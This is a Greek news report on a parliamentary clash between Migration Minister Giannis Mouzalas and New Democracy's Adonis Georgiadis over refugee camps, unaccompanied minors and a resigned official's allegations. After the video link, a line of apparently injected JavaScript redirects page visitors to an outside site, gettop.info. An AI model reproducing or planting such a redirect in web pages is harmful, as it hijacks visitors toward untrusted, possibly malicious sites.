Το… ξέσπασμα Μουζάλα: Δεν είμαι εκνευρισμένος… απογοητευμένος είμαι (BINTEO)

0
6

 

«Να μαζευτούμε λιγάκι, να ξέρουμε γιατί πράγμα μιλάμε εδώ. Θα σας πω για τα ασυνόδευτα ανήλικα, είχατε 250 θέσεις και έχουμε φτιάξει 1.100 μέσα σε έξι μήνες. Τι έχετε να πείτε; 300 θέσεις είχατε για ανήλικα. Βγαίνετε και κουνάτε τα δάχτυλα, αυτές κάνατε 10 χρόνια να τις φτιάξετε και κατηγορείτε τον ΣΥΡΙΖΑ γιατί έφτιαξε μονάχα 950 θέσεις μέσα σε έξι μήνες» ανέφερε ο υπουργός Μεταναστευτικής Πολιτικής Γιάννης Μουζάλας σε ένα ξέσπασμα του στο πλαίσιο επίκαιρης ερώτησης στη Βουλή.
Παράλληλα, πρόσθεσε «δεν είμαι εκνευρισμένος κύριοι, είμαι απογοητευμένος».

Ο κ. Μουζάλας απάντησε και στις καταγγελίες του παραιτηθέντος γενικού γραμματέα Οδυσσέα Βουδούρη.

«Του ζητήθηκε η παραίτησή του, την έδωσε», είπε. «Γράφουν οι εφημερίδες», φώναξε ο βουλευτής της Ν.Δ. Δημήτρης Κυριαζίδης.
«Με έχει καταγγείλει εφημερίδα ότι ήμουν ντυμένη νυφούλα σε γκέι πάρτι, θα με βάλετε να σας απαντήσω και γι’ αυτό επειδή γράφουν οι εφημερίδες;» του απάντησε ο κ. Μουζάλας και τόνισε: «Για εμένα το ζήτημα έχει λήξει. Προχωράμε στο πρόβλημα. Θα πρέπει τις καταγγελίες στη Ν.Δ. να τις υιοθετείτε, γιατί δεν συνηθίζεται ένας άνθρωπος να πρέπει να αποδείξει την αθωότητά του».

«Ο κ. Βουδούρης ήθελε αυξημένες αρμοδιότητες. Δεν έχω διάθεση να ασχοληθώ άλλο, έχουμε ένα σοβαρό πρόβλημα να λύσουμε. Δεν υπάρχουν σκιές, δεν υπάρχουν απευθείας αναθέσεις, ούτε μία. Γιατί το παίζετε αυτό; Ποιον θα πείσετε;», τόνισε ο αναπληρωτής υπουργός και αναφέρθηκε στην υπόθεση με τα σπιτάκια για τους πρόσφυγες: «Διεκδικούμε τα καμπ που θα φτιάξουμε να μην είναι σαν αυτά της Αφρικής, να μην είναι σκηνές και τσαντίρια, αλλά σπιτάκια. Τους δώσαμε 5 ή 6 τύπους σπιτιών και τους βάλαμε μόνο ένα όρο, να είναι 30 τ.μ. και να έχουν κουζίνα. Η Ύπατη Αρμοστεία του ΟΗΕ απάντησε ότι η απόφασή μας είναι σωστή και ότι είναι διατεθειμένη να κάνει αλλαγές».

Έντονος ήταν και ο διαξιφισμός με τον αντιπρέοδρο της ΝΔ Άδωνι Γεωργιάδη.
«Με καταπλήξατε», του απάντησε ο αντιπρόεδρος της Ν.Δ. Άδωνις Γεωργιάδης. «Πρέπει ο υπουργός να απαντά στις καταγγελίες του έως χθες γενικού του γραμματέα; Δεν είναι ο καθένας, είναι επιλογή της κυβέρνησης. Ο γενικός σας γραμματέας σας κατηγορεί ότι έχετε χάσει τον έλεγχο, ότι χάνετε 180 εκατ. Ο κ. Βουδούρης ήταν μία χαρά στο συνέδριο του ΣΥΡΙΖΑ. Έχετε στο συνέδριό σας συκοφάντες;», ρώτησε.

«Δεν έχετε επιστημονική μελέτη πάνω σ’ αυτά τα πράγματα. Με μία φοβερή λαχτάρα αρπάζετε πράγματα, πλίνθους και κέραμους ατάκτους ερριμένους, για να ρίξετε τον ΣΥΡΙΖΑ. Έτσι δεν θα πέσει ο ΣΥΡΙΖΑ», απάντησε ο κ. Μουζάλας.
«Βρήκαμε άλλη μία ευκαιρία να ξαναπούμε τα ίδια πράγματα. Δεν πρόκειται να πειστείτε διότι επιδιώκετε στο πλαίσιο του αγώνα σας κατά της κυβέρνησης να δείξετε ότι στο προσφυγικό κάτι γίνεται. Τα είχα σημειώσει και πριν τα πείτε», υπογράμμισε ο αναπληρωτής υπουργός Μεταναστευτικής Πολιτικής.

Αναφερόμενος στο θέμα των καμπ στα νησιά ο κ. Μουζάλας είπε ότι «υπάρχει σχέδιο για τα νησιά. Αλλά δεν συμφωνεί η Ν.Δ. να υπάρξουν κλειστά κέντρα στα νησιά».

«Η Ν.Δ. ποτέ δεν ήταν αντίθετη στις Αμυγδαλέζες, η Ν.Δ. έκανε Αμυγδαλέζες και χαίρεται που θέλετε να κάνετε Αμυγδαλέζες. Πρέπει όμως να γίνουν στα νησιά; Δεν πρέπει να ανησυχούν οι κάτοικοι;», απάντησε ο κ. Γεωργιάδης και πρόσθεσε ότι «διαστρεβλώσατε όλες τις θέσεις της Ν.Δ. ενώ εκπροσωπείτε μια κυβέρνηση που έκανε, όπως παραδεχθήκατε, λανθασμένη κριτική για την Αμυγδαλέζα».
Ο κ. Γεωργιάδης αναφέρθηκε στις επιπτώσεις του προσφυγικού κατηγορώντας την κυβέρνηση για έλλειψη σχεδίου. «Στη Χίο μου είπαν ότι είχαν πτώση στις πτήσεις τσάρτερ 70%. Τα ίδια και χειρότερα στη Λέσβο και τη Σάμο. Όσο εσείς βαυκαλίζεστε κάποιοι άνθρωποι χάνουν τη δουλειά τους» είπε και πρόσθεσε: «όταν είπατε ότι θα φτιάξετε τα hotspots δεν είπατε ότι θα είναι ολιγοήμερης παραμονής; Η Ν.Δ. σας λέει ότι θα ήταν για λίγες μέρες και κάθονται για μήνες. Έχετε να τους δώσετε κάποια απάντηση; Εξαπατήσατε τους νησιώτες;».

«Έλλειψη σχεδίου; Για όνομα του Θεού, πέρασαν 1 εκατ. άνθρωποι χωρίς να ανοίξει μύτη και χωρίς να δημιουργηθεί πρόβλημα. Στα χρόνια σας ξεκινήσατε την ανακατάληψη των πλατειών, ενώ τώρα ζουν σε δομές, έχουν φαγητό και ύπνο. Ξεχάσατε τα πρωτοσέλιδα για τις συμμορίες; Πού τους είχατε του αλλοδαπούς; Τους διώξατε «με τρόπο» στην Ευρώπη; Πείτε το», απάντησε ο Γ. Μουζάλας, ο οποίος παραδέχθηκε ότι υπήρξε αρνητική επίδραση στον τουρισμό: «Έχετε δίκιο. Αλλά θα μπορούσε να γίνει αλλιώς; Όποιος ασχολείται επιστημονικά με το προσφυγικό κάνει διαχείριση ζημίας και εμείς κάναμε μία καλή διαχείριση. Όποιος πιστεύει ότι έχει το μπόι να αναμετρηθεί με το μεγαλύτερο μεταναστευτικό φαινόμενο και πει ότι το έκανε καλά είναι ψεύτης».

Ο αναπληρωτής υπουργός υπερασπίσθηκε την συμφωνία Ε.Ε. – Τουρκίας ρωτώντας την Ν.Δ.: «Ξέρετε τι θα πει καταργείται η συμφωνία; 4.000 – 7.000 κάθε μέρα, κάθε μέρα. Θέσεις του κόμματός σας, του Λαϊκού Κόμματος, είναι αυτές». Τόνισε πως το ΝΑΤΟ, η FRONTEX, η Κομισιόν έχουν δηλώσει ότι τα ελληνικά σύνορα δεν είναι αφύλακτα και υπενθύμισε ότι η υγειονομική βόμβα «δεν υπάρχει, δεν έγινε, δεν έκατσε και όχι τυχαία».

«Ποιοι εκτιμούν την δουλειά που κάναμε; Ο λαός. Και αυτό το ξέρετε. Αλλά και ο γενικός γραμματέας του ΟΗΕ, ο ύπατος αρμοστής του ΟΗΕ για τους πρόσφυγες, ο Ομπάμα, η Μέρκελ, ο Ολάντ, η Κοιμσιόν, ο Τίμερμαν, ο Αβραμόπουλος», επεσήμανε ο κ. Μουζάλας, ο οποίος αναφερόμενος στα ασυνόδευτα ανήλικα ανέφερε ότι «έχουμε 1.500, αλλά δεν έχουμε κανένα σε αστυνομικό τμήμα. Και πρέπει να τα βγάλουμε και από τα καμπ».

Ο κ. Γεωργιάδης ρώτησε πόσο κοστίζει ένας πρόσφυγας και αν ισχύει ότι «συνελήφθη σε ένα κύκλωμα διακίνησης μεταναστών ένας κύριος κουρδικής καταγωγής στην Κόρινθο και ισχυρίσθηκε ότι ήταν συντονιστής στο καμπ Σκαραμαγκά. Είναι μείζον θέμα αν το υπουργείο Μεταναστευτικής Πολιτικής έκανε κάτι τέτοιο».
Ο Άδωνις Γεωργιάδης ζήτησε από τον Γιάννη Μουζάλα να τοποθετηθεί και για τα δημοσιεύματα σύμφωνα με τα οποία ένας από τους συλληφθέντες εγκληματικής οργάνωσης στην Κόρινθο που εκτός των άλλων διακινούσε παράνομα μετανάστες, είναι ο συντονιστής στο hot spot του Σκαραμαγκά.

«Είναι αληθές αυτό ή ψευδές;», είπε ο αντιπρόεδρος της Νέας Δημοκρατίας

https://youtu.be/3sZSqZl8cYU setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here